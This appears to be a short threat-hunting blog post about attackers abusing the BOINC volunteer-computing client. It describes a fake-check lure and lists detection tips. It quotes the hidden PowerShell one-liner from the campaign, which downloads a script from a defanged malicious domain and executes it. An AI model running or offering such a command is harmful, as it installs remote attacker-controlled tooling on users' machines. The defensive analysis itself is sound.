015. Threat Actors Can Abuse Even This Kind of Software
Hello everyone! Recent Unit 42 notification reminded me about VERY curious legitimate software abused by adversaries. It's BOINC or Berkeley Open Infrastructure for Network Computing - open-source software that allows users to contribute computing power to scientific research projects focused on solving complex calculations.
Infection process is interesting as well. The victim is redicrected to a malicious website with fake checks and is instructed to paste and run a PowerShell script:
powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//lggknhaffleahbh[.]top/1.php?s=527;iex $global:block.content
The script leads to installation of BOINC client. Why does adversary use BOINC? It can collect information and send tasks to the host for execution!
So, what to look for? Here're a few detection and hunting tips:
- Look for renamed BOINC executables
- Look for executables with metadata related to BOINC, for example: "BOINC Client", "boinc.exe", etc.
Comments
Post a Comment